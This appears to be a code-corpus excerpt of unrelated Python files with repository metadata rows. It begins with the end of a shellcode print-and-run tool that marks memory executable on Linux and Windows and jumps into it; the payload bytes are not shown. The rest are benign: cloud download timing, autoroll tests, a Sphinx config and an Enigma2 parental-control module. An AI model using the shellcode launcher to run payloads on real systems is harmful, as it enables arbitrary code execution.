libc.mprotect.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]
# Allocate memory with a RW private anonymous mmap
# PROT_READ=1, PROT_WRITE=2, PROT_EXEC=4
mem = libc.mmap(0, len(shellcode), 3, 0x22, -1, 0)
if int(mem) & 0xffffffff == 0xffffffff:
libc.perror(b"mmap")
return 1
# Copy the shellcode
ctypes.memmove(mem, shellcode, len(shellcode))
# Change protection to RX
if libc.mprotect(mem, len(shellcode), 5) == -1:
libc.perror(b"mprotect")
return 1
# Run!
return ctypes.CFUNCTYPE(ctypes.c_int)(mem)()
def run_code_windows(shellcode):
"""Run the specified shellcode on Windows"""
k32 = ctypes.windll.kernel32
k32.VirtualAlloc.restype = ctypes.c_void_p
int_p = ctypes.POINTER(ctypes.c_int)
k32.VirtualProtect.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int,
int_p]
# Allocate RW memory of type MEM_COMMIT | MEM_RESERVE (=0x1000|0x2000)
# PAGE_READWRITE = 4
mem = k32.VirtualAlloc(0, len(shellcode), 0x3000, 4)
if not mem:
sys.stderr.write("VirtualAlloc: {}\n".format(ctypes.FormatError()))
return 1
# Copy the shellcode
ctypes.memmove(mem, shellcode, len(shellcode))
# Change protection to PAGE_EXECUTE_READ = 0x20
oldprot = ctypes.c_int()
if not k32.VirtualProtect(mem, len(shellcode), 32, ctypes.byref(oldprot)):
sys.stderr.write("VirtualProtect: {}\n".format(ctypes.FormatError()))
return 1
# Run!
return ctypes.CFUNCTYPE(ctypes.c_int)(mem)()
def main(argv=None):
parser = argparse.ArgumentParser(description="Print or run a shellcode")
parser.add_argument('-b', '--binary', action='store_true',
help="print a binary version of the shellcode")
parser.add_argument('-c', '--c-prgm', action='store_true',
help="output a C program which launches the shellcode")
parser.add_argument('-m', '--machine', type=str,
help="machine architecture to use")
parser.add_argument('-q', '--quiet', action='store_true',
help="do not print the shellcode")
parser.add_argument('-r', '--run', action='store_true',
help="run the shellcode")
parser.add_argument('-x', '--hexa', action='store_true',
help="print the shellcode in hexadecimal")
parser.add_argument('-v', '--verbose', action='store_true',
help="be more verbose")
parser.add_argument('-L', '--linux', action='store_const',
dest='platform', const='Linux',
help="use Linux platform")
parser.add_argument('-W', '--windows', action='store_const',
dest='platform', const='Windows',
help="use Windows platform")
args = parser.parse_args(argv)
# Find out which shellcode to use
plat_sys = args.platform or platform.system()
plat_mach = normalize_arch(args.machine or platform.machine())
plat_id = '{}.{}'.format(plat_sys, plat_mach)
shc = SHELLCODES.get(plat_id)
if shc is None:
sys.stderr.write("No shellcode found for {}\n".format(plat_id))
return 1
if args.verbose:
print("Platform: {}".format(plat_id))
# Convert the shellcode to a list of ints
if sys.version_info >= (3, ):
shc_ints = [by & 0xff for by in shc]
else:
shc_ints = [ord(by) for by in shc]
# Print the shellcode
if args.c_prgm:
print('static __attribute__((__section__(".text"), __aligned__(4)))')
print('const unsigned char shellcode[{}] = {{'.format(len(shc)))
for idx in range(0, len(shc), 12):
text_data = ('0x{:02x}'.format(by) for by in shc_ints[idx:idx+12])
print(' {},'.format(', '.join(text_data)))
print('};')
print('')
print('int main(void)')
print('{')
print(' ((void (*)(void))shellcode)();')
print(' return 0;')
print('}')
elif not args.quiet:
if args.binary:
if hasattr(sys.stdout, 'buffer'):
sys.stdout.buffer.write(shc)
else:
sys.stdout.write(shc)
elif args.hexa:
print(''.join('{:02x}'.format(by) for by in shc_ints))
else:
text = repr(shc)
if text[0] == 'b':
text = text[1:]
print(text.strip('"\''))
# Run the shellcode
if args.run:
if plat_sys == 'Linux':
return run_code_linux(shc)
if plat_sys == 'Windows':
return run_code_windows(shc)
sys.stderr.write("System {} not implemented\n".format(plat_sys))
return 1
return 0
if __name__ == '__main__':
if sys.version_info < (2, 7):
sys.stderr.write("This program cannot be run in Python<2.7 mode.\n")
sys.exit(0)
sys.exit(main())
| mit | -9,078,079,875,954,633,000 | 37.165957 | 79 | 0.60553 | false |
bingjin/CloudTesting | test_cos/download.py | 1 | 1617 | #!usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author: [email protected]
# Copyright: Public Domain
#
import time
import requests
import oss2
from qcloud_cos import StatFileRequest
from qcloud_cos import CosClient
def download_oss(file):
access_key = '# 根据自己的情况填写'
access_secret = '# 根据自己的情况填写'
auth = oss2.Auth(access_key, access_secret)
endpoint = '# 根据自己的情况填写'
bucket = oss2.Bucket(auth, endpoint, '# 根据自己的情况填写')
download_url = bucket.sign_url('GET', file, 60)
start = time.time()
r = requests.get(download_url, timeout=60)
end = time.time()
if r.status_code != 200:
return 0
elapsed = (end - start) * 1000.0
print 'OSS Download File Time %0.3f ms' % elapsed
return elapsed
def download_cos(file):
appid = 100000 # 根据自己的情况填写
secret_id = u'# 根据自己的情况填写'
secret_key = u'# 根据自己的情况填写'
region = '# 根据自己的情况填写'
bucket = u'# 根据自己的情况填写'
cos_client = CosClient(appid, secret_id, secret_key, region)
request = StatFileRequest(bucket, u'/' + file)
stat = cos_client.stat_file(request)
if stat['code'] != 0:
return 0
download_url = stat['data']['source_url'] # 使用外网直接访问 URL
start = time.time()
r = requests.get(download_url, timeout=60)
end = time.time()
if r.status_code != 200:
return 0
elapsed = (end - start) * 1000.0
print 'COS Download File Time %0.3f ms' % elapsed
return elapsed
| mit | 6,060,852,200,900,478,000 | 24.245614 | 64 | 0.632384 | false |
luci/recipes-py | unittests/autoroll_test.py | 2 | 20801 | #!/usr/bin/env vpython
# Copyright 2016 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
from __future__ import print_function
import json
import sys
from google.protobuf import json_format as jsonpb
import test_env
def add_repo_with_basic_upstream_dependency(deps):
"""Does:
Create `upstream` repo with `up_mod` module, containing a single method
`cool_step`.
Make the main repo depend on this module, and use the module for a recipe
`my_recipe`.
Run simulation training for the main repo, and commit the result.
"""
upstream = deps.add_repo('upstream')
# Set up a recipe in main_repo depending on a module in upstream
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
up_commit = upstream.commit('add "up_mod"')
# Now use the upstream module in main_repo
with deps.main_repo.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['upstream'].revision = up_commit.revision
with deps.main_repo.write_recipe('my_recipe') as recipe:
recipe.DEPS = ['upstream/up_mod']
recipe.RunSteps.write('''
api.up_mod.cool_method()
''')
deps.main_repo.recipes_py('test', 'train')
deps.main_repo.commit('depend on upstream/up_mod')
class AutorollSmokeTest(test_env.RecipeEngineUnitTest):
def run_roll(self, deps, *args):
"""Runs the autoroll command and returns JSON.
Does not commit the resulting roll.
"""
outfile = self.tempfile()
output, retcode = deps.main_repo.recipes_py(
'-v', '-v', 'autoroll', '--verbose-json', '--output-json',
outfile, *args
)
if retcode != 0:
print(output, file=sys.stdout)
raise Exception('Roll failed')
with open(outfile) as fil:
return json.load(fil)
def test_empty(self):
"""Tests the scenario where there are no roll candidates."""
deps = self.FakeRecipeDeps()
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertEqual([], roll_result['roll_details'])
self.assertEqual([], roll_result['rejected_candidate_specs'])
def test_trivial(self):
"""Tests the simplest trivial (i.e. no expectation changes) roll scenario.
"""
# prep
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
with upstream.write_file('some_file') as buf:
buf.write('hi!')
upstream_commit = upstream.commit('c1')
# test
spec = deps.main_repo.recipes_cfg_pb2
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertTrue(roll_result['trivial'])
spec.deps['upstream'].revision = upstream_commit.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [
upstream_commit.as_roll_info(),
],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
self.assertEqual(expected_picked_roll['commit_infos'],
roll_result['picked_roll_details']['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
roll_result['picked_roll_details']['spec'])
self.assertEqual(
0, roll_result['picked_roll_details']['recipes_simulation_test']['rc'])
def test_nontrivial(self):
"""Tests the simplest nontrivial (i.e. expectation changes) roll scenario.
"""
deps = self.FakeRecipeDeps()
add_repo_with_basic_upstream_dependency(deps)
upstream = deps.repos['upstream']
spec = deps.main_repo.recipes_cfg_pb2
# Change implementation of up_mod in a way that's compatible, but changes
# expectations.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats down'])
''')
up_commit = upstream.commit('change "up_mod"')
# Roll again, and we can see the non-trivial roll now.
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertFalse(roll_result['trivial'])
spec.deps['upstream'].revision = up_commit.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [
up_commit.as_roll_info()
],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
picked_roll['spec'])
self.assertEqual(
1, picked_roll['recipes_simulation_test']['rc'])
self.assertEqual(
0, picked_roll['recipes_simulation_test_train']['rc'])
def test_failure(self):
"""Tests the simplest scenario where an automated roll is not possible
because of incompatible API changes.
"""
deps = self.FakeRecipeDeps()
add_repo_with_basic_upstream_dependency(deps)
upstream = deps.repos['upstream']
# Change API of the recipe module in a totally incompatible way.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def uncool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
upstream.commit('add incompatibility')
# watch our roll fail
roll_result = self.run_roll(deps)
self.assertFalse(roll_result['success'])
def test_jump_over_failure(self):
"""Tests whether the roller considers pulling more commits to make
the roll succeed, when earlier ones have incompatible API changes
fixed later.
"""
deps = self.FakeRecipeDeps()
add_repo_with_basic_upstream_dependency(deps)
upstream = deps.repos['upstream']
spec = deps.main_repo.recipes_cfg_pb2
# Change API of the recipe module in an incompatible way.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def uncool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
middle_commit = upstream.commit('add incompatibility')
# Restore compatibility, but change expectations.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats down'])
''')
final_commit = upstream.commit('restore similar method')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertFalse(roll_result['trivial'])
spec.deps['upstream'].revision = final_commit.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [
middle_commit.as_roll_info(),
final_commit.as_roll_info(),
],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
picked_roll['spec'])
self.assertEqual(
1, picked_roll['recipes_simulation_test']['rc'])
self.assertEqual(
0, picked_roll['recipes_simulation_test_train']['rc'])
def test_pick_smallest_nontrivial_roll(self):
"""Test that with several nontrivial rolls possible, the minimal one
is picked.
"""
deps = self.FakeRecipeDeps()
add_repo_with_basic_upstream_dependency(deps)
upstream = deps.repos['upstream']
spec = deps.main_repo.recipes_cfg_pb2
# Change API of the recipe module in an incompatible way.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def uncool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
middle_commit = upstream.commit('add incompatibility')
# Restore compatibility, but change expectations.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats down'])
''')
final_commit = upstream.commit('restore similar method')
# Create another change that would result in a nontrivial roll,
# which should not be picked - nontrivial rolls should be minimal.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats superdown'])
''')
upstream.commit('second nontrivial change')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertFalse(roll_result['trivial'])
spec.deps['upstream'].revision = final_commit.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [
middle_commit.as_roll_info(),
final_commit.as_roll_info(),
],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
picked_roll['spec'])
self.assertEqual(
1, picked_roll['recipes_simulation_test']['rc'])
self.assertEqual(
0, picked_roll['recipes_simulation_test_train']['rc'])
def test_pick_largest_trivial_roll(self):
"""Test that with several trivial rolls possible, the largest one is picked.
This helps avoid noise with several rolls where one is sufficient,
with no expectation changes.
"""
deps = self.FakeRecipeDeps()
add_repo_with_basic_upstream_dependency(deps)
upstream = deps.repos['upstream']
spec = deps.main_repo.recipes_cfg_pb2
# Change API of the recipe module in an incompatible way.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def uncool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
first_commit = upstream.commit('add incompatibility')
# Restore compatibility, but change expectations.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats down'])
''')
second_commit = upstream.commit('restore similar method')
# Create another change that would result in a nontrivial roll,
# which should not be picked - nontrivial rolls should be minimal.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats superdown'])
''')
third_commit = upstream.commit('second nontrivial change')
# Introduce another commit which makes the roll trivial again.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
final_commit = upstream.commit('restore original behavior')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertTrue(roll_result['trivial'])
spec.deps['upstream'].revision = final_commit.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [
first_commit.as_roll_info(),
second_commit.as_roll_info(),
third_commit.as_roll_info(),
final_commit.as_roll_info(),
],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
picked_roll['spec'])
self.assertEqual(
0, picked_roll['recipes_simulation_test']['rc'])
def test_find_minimal_candidate(self):
"""Tests that the roller can automatically find a viable minimal
roll candidate, in a scenario where previous roll algorithm
was getting stuck.
"""
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
super_upstream = deps.add_repo('super_upstream')
spec = deps.main_repo.recipes_cfg_pb2
# Now make upstream depend on super_upstream, then roll that into the main
# repo.
upstream.add_dep('super_upstream')
super_commit = upstream.commit('add dep on super_upstream')
with deps.main_repo.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['upstream'].revision = super_commit.revision
deps.main_repo.commit('roll upstream')
# Set up a recipe in the main repo depending on a module in upstream.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def cool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
up_commit = upstream.commit('add up_mod')
with deps.main_repo.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['upstream'].revision = up_commit.revision
with deps.main_repo.write_recipe('my_recipe') as recipe:
recipe.DEPS = ['upstream/up_mod']
recipe.RunSteps.write('''
api.up_mod.cool_method()
''')
deps.main_repo.recipes_py('test', 'train')
deps.main_repo.commit('depend on upstream/up_mod')
# Create a new commit in super_uptsream repo and roll it into upstream.
super_commit = super_upstream.commit('trivial commit')
with upstream.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['super_upstream'].revision = super_commit.revision
super_roll = upstream.commit('roll super_upstream')
# Change API of the upstream module in an incompatible way.
with upstream.write_module('up_mod') as mod:
mod.api.write('''
def uncool_method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
up_commit = upstream.commit('incompatible up_mod')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertTrue(roll_result['trivial'])
spec.deps['super_upstream'].revision = super_commit.revision
spec.deps['upstream'].revision = super_roll.revision
expected_picked_roll = {
'commit_infos': {
'upstream': [super_roll.as_roll_info()],
'super_upstream': [super_commit.as_roll_info()],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'],
picked_roll['spec'])
self.assertEqual(
0, picked_roll['recipes_simulation_test']['rc'])
def test_no_backwards_roll(self):
"""Tests that we never roll backwards."""
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
super_upstream = deps.add_repo('super_upstream')
original_super_commit = super_upstream.backend.commit_metadata('HEAD')
upstream.add_dep('super_upstream')
upstream.commit('add dep on super_upstream')
# Create a new commit in super_upstream repo and roll it to upstream.
super_commit = super_upstream.commit('trivial commit')
with upstream.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['super_upstream'].revision = super_commit.revision
up_commit = upstream.commit('roll')
# Roll above commits to main_repo.
with deps.main_repo.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['upstream'].revision = up_commit.revision
pkg_pb.deps['super_upstream'].revision = super_commit.revision
deps.main_repo.commit('roll upstream+super_upstream')
spec = deps.main_repo.recipes_cfg_pb2
# Create a new commit in upstream that would result in backwards roll.
with upstream.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['super_upstream'].revision = original_super_commit.revision
up_commit = upstream.commit('backwards commit')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertEqual([], roll_result['roll_details'])
spec.deps['upstream'].revision = up_commit.revision
self.assertEqual(
roll_result['rejected_candidate_specs'],
[jsonpb.MessageToDict(spec, preserving_proto_field_name=True)],
)
def test_inconsistent_errors(self):
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
upstream_deeper = deps.add_repo('upstream_deeper')
upstream_deepest = deps.add_repo('upstream_deepest')
# Add:
# upstream_deeper -> upstream_deepest
# upstream -> upstream_deeper
# upstream -> upstream_deepest
upstream_deeper.add_dep('upstream_deepest')
upstream_deeper.commit('add dep on upstream_deepest')
upstream.add_dep('upstream_deeper', 'upstream_deepest')
upstream.commit('add dep on upstream_deepest + upstream_deeper')
# Roll all of that into main.
self.run_roll(deps)
# Create a new commit in deepest repo and roll it to deeper.
deepest_commit = upstream_deepest.commit('deep commit')
with upstream_deeper.edit_recipes_cfg_pb2() as pkg_pb:
pkg_pb.deps['upstream_deepest'].revision = deepest_commit.revision
upstream_deeper.commit('roll deepest')
# We shouldn't be able to roll upstream_deeper/upstream_deepest until
# upstream includes them. i.e. there should be no roll, because there are no
# valid roll candidates.
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertEqual([], roll_result['roll_details'])
self.assertGreater(len(roll_result['rejected_candidate_specs']), 0)
def test_inconsistent_candidates_do_not_advance(self):
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
upstream_deeper = deps.add_repo('upstream_deeper')
# Add:
# upstream -> upstream_deeper
upstream.add_dep('upstream_deeper')
upstream.commit('add dep on upstream_deeper')
# Roll all of that into main.
self.run_roll(deps)
# Create 2 commits in deepest repo that are not rolled into anything
with upstream_deeper.write_module('deeper1_mod') as mod:
mod.api.write('''
def method(self):
self.m.step('deeper1 step', ['echo', 'whats up'])
''')
upstream_deeper.commit('add deeper1_mod')
with upstream_deeper.write_module('deeper2_mod') as mod:
mod.api.write('''
def method(self):
self.m.step('deeper2 step', ['echo', 'whats up'])
''')
upstream_deeper.commit('add deeper2_mod')
# Create a commit in deeper repo
with upstream.write_module('upstream_mod') as mod:
mod.api.write('''
def method(self):
self.m.step('upstream step', ['echo', 'whats up'])
''')
upstream_commit = upstream.commit('add upstream_mod')
# We can't roll either commit in upstream_deeper because they are
# inconsistent with upstream's pin for upstream_deeper, but upstream's
# commit should still be able to roll
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
spec = deps.main_repo.recipes_cfg_pb2
expected_picked_roll = {
'commit_infos': {
'upstream': [upstream_commit.as_roll_info(),],
},
'spec': jsonpb.MessageToDict(spec, preserving_proto_field_name=True),
}
picked_roll = roll_result['picked_roll_details']
self.assertEqual(expected_picked_roll['commit_infos'],
picked_roll['commit_infos'])
self.assertEqual(expected_picked_roll['spec'], picked_roll['spec'])
def test_roll_adds_dependency(self):
deps = self.FakeRecipeDeps()
upstream = deps.add_repo('upstream')
other = deps.add_repo('other')
with deps.main_repo.edit_recipes_cfg_pb2() as spec:
del spec.deps['other']
deps.main_repo.commit('remove other dep')
spec = deps.main_repo.recipes_cfg_pb2
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
self.assertEqual(spec, deps.main_repo.recipes_cfg_pb2) # noop
# Now we add a commit to 'upstream' which pulls in 'other'.
upstream.add_dep('other')
upstream.commit('add other dep')
with upstream.write_file('trivial') as fil:
fil.write('trivial file')
up_commit = upstream.commit('add trivial file')
roll_result = self.run_roll(deps)
self.assertTrue(roll_result['success'])
spec.deps['upstream'].revision = up_commit.revision
spec.deps['other'].CopyFrom(upstream.recipes_cfg_pb2.deps['other'])
self.assertEqual(spec, deps.main_repo.recipes_cfg_pb2)
if __name__ == '__main__':
test_env.main()
| apache-2.0 | -3,812,016,209,446,625,000 | 34.018519 | 80 | 0.650161 | false |
openstack/networking-odl | doc/source/conf.py | 1 | 2835 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'openstackdocstheme',
'oslo_config.sphinxext',
]
# openstackdocstheme options
openstackdocs_repo_name = 'openstack/networking-odl'
openstackdocs_pdf_link = True
openstackdocs_auto_name = False
openstackdocs_bug_project = 'networking-odl'
openstackdocs_bug_tag = 'doc'
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'networking-odl'
copyright = '2013, OpenStack Foundation'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
html_theme = 'openstackdocs'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'doc-%s.tex' % project,
'%s Documentation' % project,
'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
#intersphinx_mapping = {'http://docs.python.org/': None}
latex_elements = {
'makeindex': '',
'printindex': '',
'preamble': r'\setcounter{tocdepth}{3}',
}
| apache-2.0 | -4,264,224,869,683,919,400 | 30.853933 | 79 | 0.694533 | false |
BlackHole/enigma2-obh10 | lib/python/Components/ParentalControl.py | 2 | 12140 | from Components.config import config, ConfigSubsection, ConfigSelection, ConfigPIN, ConfigYesNo, ConfigSubList, ConfigInteger
from Components.ServiceList import refreshServiceList
from Screens.InputBox import PinInput
from Screens.MessageBox import MessageBox
from Tools.BoundFunction import boundFunction
from ServiceReference import ServiceReference
from Tools import Notifications
from Tools.Directories import resolveFilename, SCOPE_CONFIG
from Tools.Notifications import AddPopup
from enigma import eTimer, eServiceCenter, iServiceInformation, eServiceReference, eDVBDB
import time
import os
TYPE_SERVICE = "SERVICE"
TYPE_BOUQUETSERVICE = "BOUQUETSERVICE"
TYPE_BOUQUET = "BOUQUET"
LIST_BLACKLIST = "blacklist"
def InitParentalControl():
config.ParentalControl = ConfigSubsection()
config.ParentalControl.storeservicepin = ConfigSelection(default="never", choices=[("never", _("never")), ("5", _("%d minutes") % 5), ("30", _("%d minutes") % 30), ("60", _("%d minutes") % 60), ("standby", _("until standby/restart"))])
config.ParentalControl.configured = ConfigYesNo(default=False)
config.ParentalControl.setuppinactive = ConfigYesNo(default=False)
config.ParentalControl.retries = ConfigSubsection()
config.ParentalControl.retries.servicepin = ConfigSubsection()
config.ParentalControl.retries.servicepin.tries = ConfigInteger(default=3)
config.ParentalControl.retries.servicepin.time = ConfigInteger(default=3)
config.ParentalControl.servicepin = ConfigSubList()
config.ParentalControl.servicepin.append(ConfigPIN(default=0))
config.ParentalControl.age = ConfigSelection(default="18", choices=[("0", _("No age block"))] + list((str(x), "%d+" % x) for x in range(3, 19)))
config.ParentalControl.hideBlacklist = ConfigYesNo(default=False)
config.ParentalControl.config_sections = ConfigSubsection()
config.ParentalControl.config_sections.main_menu = ConfigYesNo(default=False)
config.ParentalControl.config_sections.configuration = ConfigYesNo(default=False)
config.ParentalControl.config_sections.timer_menu = ConfigYesNo(default=False)
config.ParentalControl.config_sections.plugin_browser = ConfigYesNo(default=False)
config.ParentalControl.config_sections.standby_menu = ConfigYesNo(default=False)
config.ParentalControl.config_sections.software_update = ConfigYesNo(default=False)
config.ParentalControl.config_sections.manufacturer_reset = ConfigYesNo(default=True)
config.ParentalControl.config_sections.movie_list = ConfigYesNo(default=False)
config.ParentalControl.config_sections.context_menus = ConfigYesNo(default=False)
config.ParentalControl.config_sections.vixmenu = ConfigYesNo(default=False)
#Added for backwards compatibility with some 3rd party plugins that depend on this config
config.ParentalControl.servicepinactive = config.ParentalControl.configured
config.ParentalControl.setuppin = config.ParentalControl.servicepin[0]
config.ParentalControl.retries.setuppin = config.ParentalControl.retries.servicepin
config.ParentalControl.type = ConfigSelection(default="blacklist", choices=[(LIST_BLACKLIST, _("blacklist"))])
global parentalControl
parentalControl = ParentalControl()
class ParentalControl:
def __init__(self):
#Do not call open on init, because bouquets are not ready at that moment
self.filesOpened = False
self.PinDlg = None
#This is the timer that is used to see, if the time for caching the pin is over
#Of course we could also work without a timer and compare the times every
#time we call isServicePlayable. But this might probably slow down zapping,
#That's why I decided to use a timer
self.sessionPinTimer = eTimer()
self.sessionPinTimer.callback.append(self.resetSessionPin)
self.getConfigValues()
def serviceMethodWrapper(self, service, method, *args):
#This method is used to call all functions that need a service as Parameter:
#It takes either a Service- Reference or a Bouquet- Reference and passes
#Either the service or all services contained in the bouquet to the method given
#That way all other functions do not need to distinguish between service and bouquet.
if "FROM BOUQUET" in service:
method(service, TYPE_BOUQUET, *args)
servicelist = self.readServicesFromBouquet(service, "C")
for ref in servicelist:
sRef = str(ref[0])
method(sRef, TYPE_BOUQUETSERVICE, *args)
else:
ref = ServiceReference(service)
sRef = str(ref)
method(sRef, TYPE_SERVICE, *args)
def isProtected(self, ref):
if not config.ParentalControl.servicepinactive.value or not ref:
return False
#Check if configuration has already been read or if the significant values have changed.
#If true: read the configuration
if self.storeServicePin != config.ParentalControl.storeservicepin.value:
self.getConfigValues()
service = ref.toCompareString()
path = ref.getPath()
info = eServiceCenter.getInstance().info(ref)
age = 0
if path.startswith("/"):
if service.startswith("1:"):
refstr = info and info.getInfoString(ref, iServiceInformation.sServiceref)
service = refstr and eServiceReference(refstr).toCompareString()
if [x for x in path[1:].split("/") if x.startswith(".") and not x == ".Trash"]:
age = 18
elif int(config.ParentalControl.age.value):
event = info and info.getEvent(ref)
rating = event and event.getParentalData()
age = rating and rating.getRating()
age = age and age <= 15 and age + 3 or 0
return (age and age >= int(config.ParentalControl.age.value)) or service and service in self.blacklist
def isServicePlayable(self, ref, callback, session=None):
self.session = session
if self.isProtected(ref):
#Check if the session pin is cached
if self.sessionPinCached:
return True
self.callback = callback
service = ref.toCompareString()
title = 'FROM BOUQUET "userbouquet.' in service and _("this bouquet is protected by a parental control pin") or _("this service is protected by a parental control pin")
if session:
Notifications.RemovePopup("Parental control")
if self.PinDlg:
self.PinDlg.close()
self.PinDlg = session.openWithCallback(boundFunction(self.servicePinEntered, ref), PinInput, triesEntry=config.ParentalControl.retries.servicepin, pinList=self.getPinList(), service=ServiceReference(ref).getServiceName(), title=title, windowTitle=_("Parental control"), simple=False)
else:
Notifications.AddNotificationParentalControl(boundFunction(self.servicePinEntered, ref), PinInput, triesEntry=config.ParentalControl.retries.servicepin, pinList=self.getPinList(), service=ServiceReference(ref).getServiceName(), title=title, windowTitle=_("Parental control"))
return False
else:
return True
def protectService(self, service):
if service not in self.blacklist:
self.serviceMethodWrapper(service, self.addServiceToList, self.blacklist)
if config.ParentalControl.hideBlacklist.value and not self.sessionPinCached:
eDVBDB.getInstance().addFlag(eServiceReference(service), 2)
def unProtectService(self, service):
if service in self.blacklist:
self.serviceMethodWrapper(service, self.removeServiceFromList, self.blacklist)
def getProtectionLevel(self, service):
return service not in self.blacklist and -1 or 0
def isServiceProtectionBouquet(self, service):
return service in self.blacklist and TYPE_BOUQUETSERVICE in self.blacklist[service]
def getConfigValues(self):
#Read all values from configuration
